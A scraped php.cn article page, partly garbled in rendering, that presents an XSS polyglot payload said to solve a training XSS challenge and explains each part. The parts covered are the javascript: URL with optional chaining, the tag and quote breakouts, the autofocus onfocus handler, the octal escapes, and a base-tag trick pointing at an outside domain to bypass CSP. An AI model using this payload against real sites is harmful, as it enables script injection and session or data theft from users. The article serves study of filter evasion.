简体中文(ZH-CN)English(EN)繁体中文(ZH-TW)日本語(JA)한국어(KO)Melayu(MS)Français(FR)Deutsch(DE)
ホームページ
記事
に質問
コース
特集
ダウンロード
ゲーム
辞書
最近の更新

ホームページ  >  記事  >  ウェブフロントエンド  >  Polyglot はトレーニング XSS マッスル チャレンジのほとんどを解決します

Polyglot はトレーニング XSS マッスル チャレンジのほとんどを解決します

DDD
DDDオリジナル
2024-09-14 10:32:201099ブラウズ

Polyglot solve most of Training XSS Muscles Challenge

JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

Core Idea:
This payload is designed to bypass several XSS filters and security mechanisms by working in various HTML contexts. It uses a combination of HTML and JavaScript tricks to inject a malicious payload, such as the alert() function, in a variety of ways.

Top-Level Concepts:
Polyglot Basics:
A polyglot is a payload that can execute in multiple contexts, typically both in HTML, attributes, or JavaScript contexts, making it more versatile for exploiting XSS vulnerabilities.
The goal of this payload is to inject JavaScript and execute alert(1) across multiple contexts while bypassing filters.
Polyglot Sections:
JavaScript Execution with Optional Chaining:

JavaScript://%250Aalert?.(1)//

The JavaScript protocol triggers the payload in browsers that interpret JavaScript from URL protocols.
%250A is the URL-encoded form of a newline character (\n), used to bypass URL validation or escape filters.
alert?.(1) is an optional chaining syntax in JavaScript. It executes alert(1) if alert exists, bypassing strict checks on direct calls to alert().
// terminates the rest of the payload as a comment to avoid errors.
HTML Tag Breakouts:

</Title/</Style/</Script/</textArea/</iFrame/</noScript>

This section attempts to break out of various HTML tags like , <style>, <script>, <textarea>, and others.<br> It ends the tags early (</...>) so that JavaScript can be executed right after the tag, bypassing filtering or restrictions based on tag contexts.<br> It’s compact since it doesn’t close each tag properly; just one closing symbol (>) suffices for all.<br> Quote Breakouts:<br> </p> <pre class="brush:php;toolbar:false">/*'/*\'/*"/*\"/*\/%26apos;)/<!-->` </pre> <p>This section handles breaking out of quote contexts (", ', `). It uses JavaScript comments(/.../) to inject and terminate multiline comment blocks that might be initiated by filters.<br> /<em>...</em>/ is useful for multiline comments and ignoring filter checks.<br> %26apos;) is an HTML entity escape code for ', used to break out of attributes or string contexts that use HTML entities for sanitization.<br> Event Handler and Execution:</p> <p>`<br> \74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1)}//><br> `<br> \74k<K is a trick to insert an arbitrary tag where \74 is the octal representation of <. This works to bypass filters that sanitize < by converting it into an octal entity.<br> K is an arbitrary tag (can be any character) with the attributes contentEditable, autoFocus, and OnFocus.<br> The OnFocus=/**/{(alert)(1)} ensures that when the element gains focus, it executes the alert(1) function.<br> Advanced Evasion Techniques:</p> <p>`<br> <Base/Href=//X55.is\76--><br> `<br> <Base> is used for CSP bypass. If the base URL is set to a malicious domain like //X55.is, relative URL references to scripts or assets can trigger cross-origin requests, executing external malicious scripts.<br> /76 is the octal code for >, and it's used to properly close the tag while bypassing filters that escape < and >. This is part of the trick where octal escapes are converted back into characters.<br> HTML Comment Insertion:</p> <p><!--> is a simple HTML comment injection that ends any HTML comment block started by a filter, allowing the payload to escape the context.<br> Polyglot Logic:<br> Bypassing HTML Filters: The polyglot uses tag closings, quote breakouts, and event handlers to escape multiple HTML tags and execute JavaScript in different contexts.<br> Bypassing JavaScript Filters: Through commenting techniques (/<em>...</em>/, //) and quote escapes, it handles multiline scripts and prevents syntax errors.<br> Filter Evasion: By using HTML entities, optional chaining, and octal escapes, it bypasses common sanitization filters and CSP rules.<br> Mind Map Summary:<br> Polyglot Core:<br> JavaScript Execution (alert?.(1))<br> HTML Context Breakouts ()<br> JavaScript String Injection:<br> Escape Quotes (/<em>'/</em>\'/<em>"/</em>)<br> Inline Comments and Multiline Escapes (//, /<em>...</em>/)<br> HTML Tag Evasion:<br> Tag Close Breakouts ()<br> Arbitrary Tag Injection with Event Handler ()<br> Advanced Tricks:<br> Octal Encoding for < and > (\74 and \76)<br> CSP Bypass using and external URL (Base/Href=//X55.is)<br> Final Injection:</p> <blockquote> <p>Mixed context polyglot triggering across multiple browsers and scenarios.<br> This polyglot is highly effective in breaking out of multiple contexts, evading JavaScript string handling and HTML tag closures, and executing in both</p> </blockquote> <p>以上がPolyglot はトレーニング XSS マッスル チャレンジのほとんどを解決しますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。</p></div><div class="nphpQianMsg"><a href="javascript:void(0);">JavaScript</a> <a href="javascript:void(0);">html</a> <a href="javascript:void(0);">xss</a> <a href="javascript:void(0);">String</a> <a href="javascript:void(0);">if</a> <a href="javascript:void(0);">for</a> <a href="javascript:void(0);">while</a> <a href="javascript:void(0);">Filter</a> <a href="javascript:void(0);">break</a> <a href="javascript:void(0);">using</a> <a href="javascript:void(0);">Event</a> <a href="javascript:void(0);">map</a> <a href="javascript:void(0);">symbol</a> <a href="javascript:void(0);">function</a> <a href="javascript:void(0);">this</a> <a href="javascript:void(0);">href</a> <a href="javascript:void(0);">alert</a> <a href="javascript:void(0);">idea</a><div class="clear"></div></div><div class="nphpQianSheng"><span>声明:</span><div>この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。</div></div></div><div class="nphpSytBox"><span>前の記事:<a class="dBlack" title="問題への対処" href="http://m.php.cn/ja/faq/1796607755.html">問題への対処</a></span><span>次の記事:<a class="dBlack" title="問題への対処" href="http://m.php.cn/ja/faq/1796607933.html">問題への対処</a></span></div><div class="nphpSytBox2"><div class="nphpZbktTitle"><h2>関連記事</h2><em><a href="http://m.php.cn/ja/article.html" class="bBlack"><i>続きを見る</i><b></b></a></em><div class="clear"></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="fluid" data-ad-layout-key="-6t+ed+2i-1n-4w" data-ad-client="ca-pub-5902227090019525" data-ad-slot="8966999616"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><ul class="nphpXgwzList"><li><b></b><a href="http://m.php.cn/ja/faq/1609.html" title="Bootstrap リスト グループ コンポーネントの詳細な分析" class="aBlack">Bootstrap リスト グループ コンポーネントの詳細な分析</a><div class="clear"></div></li><li><b></b><a href="http://m.php.cn/ja/faq/1640.html" title="JavaScript関数のカリー化の詳細説明" class="aBlack">JavaScript関数のカリー化の詳細説明</a><div class="clear"></div></li><li><b></b><a href="http://m.php.cn/ja/faq/1949.html" title="JS パスワードの生成と強度検出の完全な例 (デモ ソース コードのダウンロード付き)" class="aBlack">JS パスワードの生成と強度検出の完全な例 (デモ ソース コードのダウンロード付き)</a><div class="clear"></div></li><li><b></b><a href="http://m.php.cn/ja/faq/2248.html" title="Angularjs は WeChat UI (weui) を統合します" class="aBlack">Angularjs は WeChat UI (weui) を統合します</a><div class="clear"></div></li><li><b></b><a href="http://m.php.cn/ja/faq/2351.html" title="JavaScript を使用して繁体字中国語と簡体字中国語をすばやく切り替える方法と、簡体字中国語と繁体字中国語の切り替えをサポートする Web サイトのトリック_javascript スキル" class="aBlack">JavaScript を使用して繁体字中国語と簡体字中国語をすばやく切り替える方法と、簡体字中国語と繁体字中国語の切り替えをサポートする Web サイトのトリック_javascript スキル</a><div class="clear"></div></li></ul></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-5902227090019525" data-ad-slot="5027754603"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><div class="nphpFoot"><div class="nphpFootBg"><ul class="nphpFootMenu"><li><a href="http://m.php.cn/ja/"><b class="icon1"></b><p>ホームページ</p></a></li><li><a href="http://m.php.cn/ja/course.html"><b class="icon2"></b><p>コース</p></a></li><li><a href="http://m.php.cn/ja/wenda.html"><b class="icon4"></b><p>に質問</p></a></li><li><a href="http://m.php.cn/ja/login"><b class="icon5"></b><p>私の</p></a></li><div class="clear"></div></ul></div></div><div class="nphpYouBox" style="display: none;"><div class="nphpYouBg"><div class="nphpYouTitle"><span onclick="$('.nphpYouBox').hide()"></span><a href="http://m.php.cn/ja/"></a><div class="clear"></div></div><ul class="nphpYouList"><li><a href="http://m.php.cn/ja/"><b class="icon1"></b><span>ホームページ</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/course.html"><b class="icon2"></b><span>コース</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/article.html"><b class="icon3"></b><span>記事</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/wenda.html"><b class="icon4"></b><span>に質問</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/dic.html"><b class="icon6"></b><span>辞書</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/course/type/99.html"><b class="icon7"></b><span>マニュアル</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/xiazai/"><b class="icon8"></b><span>ダウンロード</span><div class="clear"></div></a></li><li><a href="http://m.php.cn/ja/faq/zt" title="特集"><b class="icon12"></b><span>特集</span><div class="clear"></div></a></li><div class="clear"></div></ul></div></div><div class="nphpDing" style="display: none;"><div class="nphpDinglogo"><a href="http://m.php.cn/ja/"></a></div><div class="nphpNavIn1"><div class="swiper-container nphpNavSwiper1"><div class="swiper-wrapper"><div class="swiper-slide"><a href="http://m.php.cn/ja/" >ホームページ</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/article.html" class="hover">記事</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/wenda.html" >に質問</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/course.html" >コース</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/faq/zt" >特集</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/xiazai" >ダウンロード</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/game" >ゲーム</a></div><div class="swiper-slide"><a href="http://m.php.cn/ja/dic.html" >辞書</a></div><div class="clear"></div></div></div><div class="langadivs" ><a href="javascript:;" class="bg4 bglanguage"></a><div class="langadiv" ><a onclick="javascript:setlang('zh-cn');" class="language course-right-orders chooselan " href="javascript:;"><span>简体中文</span><span>(ZH-CN)</span></a><a onclick="javascript:setlang('en');" class="language course-right-orders chooselan " href="javascript:;"><span>English</span><span>(EN)</span></a><a onclick="javascript:setlang('zh-tw');" class="language course-right-orders chooselan " href="javascript:;"><span>繁体中文</span><span>(ZH-TW)</span></a><a onclick="javascript:;" class="language course-right-orders chooselan chooselanguage" href="javascript:;"><span>日本語</span><span>(JA)</span></a><a onclick="javascript:setlang('ko');" class="language course-right-orders chooselan " href="javascript:;"><span>한국어</span><span>(KO)</span></a><a onclick="javascript:setlang('ms');" class="language course-right-orders chooselan " href="javascript:;"><span>Melayu</span><span>(MS)</span></a><a onclick="javascript:setlang('fr');" class="language course-right-orders chooselan " href="javascript:;"><span>Français</span><span>(FR)</span></a><a onclick="javascript:setlang('de');" class="language course-right-orders chooselan " href="javascript:;"><span>Deutsch</span><span>(DE)</span></a></div></div><script> var swiper = new Swiper('.nphpNavSwiper1', { slidesPerView : 'auto', observer: true,//修改swiper自己或子元素时,自动初始化swiper observeParents: true,//修改swiper的父元素时,自动初始化swiper }); </script></div></div><!--顶部导航 end--><script>isLogin = 0;</script><script type="text/javascript" src="/static/layui/layui.js"></script><script type="text/javascript" src="/static/js/global.js?4.9.47"></script></div><script src="https://vdse.bdstatic.com//search-video.v1.min.js"></script><link rel='stylesheet' id='_main-css' href='/static/css/viewer.min.css' type='text/css' media='all'/><script type='text/javascript' src='/static/js/viewer.min.js?1'></script><script type='text/javascript' src='/static/js/jquery-viewer.min.js'></script><script>jQuery.fn.wait = function (func, times, interval) { var _times = times || -1, //100次 _interval = interval || 20, //20毫秒每次 _self = this, _selector = this.selector, //选择器 _iIntervalID; //定时器id if( this.length ){ //如果已经获取到了,就直接执行函数 func && func.call(this); } else { _iIntervalID = setInterval(function() { if(!_times) { //是0就退出 clearInterval(_iIntervalID); } _times <= 0 || _times--; //如果是正数就 -- _self = $(_selector); //再次选择 if( _self.length ) { //判断是否取到 func && func.call(_self); clearInterval(_iIntervalID); } }, _interval); } return this; } $("table.syntaxhighlighter").wait(function() { $('table.syntaxhighlighter').append("<p class='cnblogs_code_footer'><span class='cnblogs_code_footer_icon'></span></p>"); }); $(document).on("click", ".cnblogs_code_footer",function(){ $(this).parents('table.syntaxhighlighter').css('display','inline-table');$(this).hide(); }); $('.nphpQianCont').viewer({navbar:true,title:false,toolbar:false,movable:false,viewed:function(){$('img').click(function(){$('.viewer-close').trigger('click');});}}); </script></body></html>